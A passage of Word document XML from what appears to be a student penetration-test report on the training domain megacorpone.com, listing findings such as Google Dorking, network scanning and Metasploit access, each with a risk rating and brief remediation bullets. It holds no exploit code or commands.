        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Set up two-factor authentication instead of basic authentication to prevent dictionary attacks from being successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Require a strong password complexity that requires passwords to be over 12 characters long, upper+lower case, &amp; include a special character.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset the user </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">thudson’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Encrypt data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:t>[List any other vulnerabilities you found here. Feel free to go i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:t>nto as much detail (including technical detail) as you want.]</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35" w:name="_r7g41033celh" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Employee Information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38761D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Risk Rating</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="38761D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Low</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Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Through Google Dorking, we can access employee names and email addresses.</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b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Affected Hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: vpn.megacorpone.com</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Remediation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Create uniq</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ue email addresses for users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Remove employee information from the website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Encrypting information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Protect sensitive content by utilizing a robots.txt</w:t>
      </w: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36" w:name="_3kafr8mfk6or" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Certificate and Domain Transparency</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38761D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Risk Rating</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="38761D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Low</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Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We can look up domain information, open ports, IP address, conduct C2 research, etc.</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b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Affected Hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: vpn.megacorpone.com</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Remediation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Use Private VPNs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Use HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run Shodan against yourself</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_xup316layy2r" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_2wzg5mw6i0yn" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Network Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Risk Rating</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Medium</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Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We are ab</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>le to scan and discover networks and ports you are using.</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b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Affected Hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: vpn.megacorpone.com</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Remediation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Set up firewalls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_c76j66oj39qm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_ecbyfwxlpnvy" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Risk Rating</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Critical</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Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We can access the network using Metasploit.</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b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Affected Hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: vpn.megacorpone.com</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Remediation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Have threat detectors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Check who is on the network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Limit amount of users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_19ohpx4qx0b1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Risk Rating</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Critical</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Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We can access manipulate information once we are in the network.</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b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Affected Hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: vpn.megacorpone.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>What We Were Able to Do:</w:t>
      </w:r>
    </w:p>
